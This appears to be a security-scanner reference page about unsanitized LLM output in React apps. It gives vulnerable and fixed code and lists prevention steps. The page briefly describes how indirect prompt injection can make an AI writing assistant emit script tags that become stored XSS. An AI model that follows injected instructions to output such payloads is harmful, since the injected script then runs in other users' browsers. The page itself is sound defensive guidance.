mediumCWE-79OWASP LLM02:2025

No AI Output Sanitization

LLM-generated HTML or code is rendered directly in the UI without sanitization, opening the door to stored XSS attacks.

How It Works

If your app asks an LLM to generate HTML content (emails, reports, markdown) and you render it with dangerouslySetInnerHTML or innerHTML without stripping malicious tags, an attacker can use prompt injection to make the AI output a script tag. That script then runs in every user's browser who views the content.

Vulnerable Code
// BAD: rendering AI-generated markdown as HTML without sanitization
const aiHtml = marked(aiGeneratedMarkdown); // converts markdown to HTML
return <div dangerouslySetInnerHTML={{ __html: aiHtml }} />;
Secure Code
// GOOD: sanitize the HTML after markdown conversion
import DOMPurify from 'dompurify';
const rawHtml = marked(aiGeneratedMarkdown);
const safeHtml = DOMPurify.sanitize(rawHtml, { USE_PROFILES: { html: true } });
return <div dangerouslySetInnerHTML={{ __html: safeHtml }} />;

Real-World Example

Researchers showed that AI writing assistants generating HTML content could be manipulated via indirect prompt injection to include XSS payloads. If that content is stored and shown to other users, it becomes a stored XSS vulnerability at scale.

How to Prevent It

  • Always run AI-generated HTML through DOMPurify before using dangerouslySetInnerHTML
  • Use a Content Security Policy (CSP) that blocks inline scripts as a defense-in-depth measure
  • Consider using a markdown renderer that outputs sanitized HTML by default (like rehype-sanitize)
  • Validate that AI output only contains expected HTML elements for your use case
  • Log AI outputs that contain suspicious patterns (script tags, event handlers) for review

Affected Technologies

Node.jsReact

Data Hogo detects this vulnerability automatically.

Scan Your Repo Free

Related Vulnerabilities